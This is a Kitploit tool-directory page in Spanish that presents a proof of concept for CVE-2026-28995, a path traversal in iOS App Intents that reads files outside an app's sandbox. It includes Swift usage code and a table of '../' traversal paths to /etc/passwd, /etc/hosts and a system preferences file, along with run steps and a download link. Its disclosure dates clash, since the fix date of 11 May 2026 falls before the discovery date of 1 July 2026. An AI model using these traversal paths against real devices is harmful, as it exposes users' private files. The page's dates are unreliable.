Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-28995 — # CVE-2026-28995 Prueba de concepto para CVE-2026-28995 — Vulnerabilidad de Path Traversal en App Intents en iOS 26.4.2 y versiones inferiores. | Kitploit
Herramientas/GitHubGitHub/robertmak2014-sudow/cve-2026-28995
Seguridad iOSAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad Móvil
GitHubrobertmak2014-sudow/cve-2026-28995

CVE-2026-28995

# CVE-2026-28995 Prueba de concepto para CVE-2026-28995 — Vulnerabilidad de Path Traversal en App Intents en iOS 26.4.2 y versiones inferiores.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
42hace 1 mesAún no revisado

CVE-2026-28995

Prueba de concepto para CVE-2026-28995 — Vulnerabilidad de path traversal en App Intents en iOS 26.4.2 y anteriores.

Descripción

Esta vulnerabilidad permite que una aplicación maliciosa lea cualquier archivo fuera de su sandbox mediante App Intents. La causa raíz es una validación de ruta insuficiente en el framework App Intents de Apple.

Versiones afectadas: iOS 26.4.2 y anteriores
Corregido en: iOS 26.5 (11 de mayo de 2026)

Uso

1. Función readCve(path: String) -> String

root@kitploit:~
let intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)

2. Ejemplos de rutas

Ruta Lee ../../../../../../../../../../../../../etc/passwd Contraseñas de usuario ../../../../../../../../../../../../../etc/hosts Archivo de hosts ../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist Preferencias del sistema

3. Manejo de directorios

Si la ruta apunta a un directorio, la función devuelve:

root@kitploit:~
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/

Cómo ejecutar

  1. Crea un proyecto iOS en Xcode.
  2. Añade CVE-2026-28995.swift al proyecto.
  3. Llama a readCve(path:) con la ruta objetivo.
  4. Ejecuta en iOS 26.4.2 o anterior.

Divulgación responsable

Descubierto: 1 de julio de 2026
Corregido en: iOS 26.5 (11 de mayo de 2026)

Descargar herramienta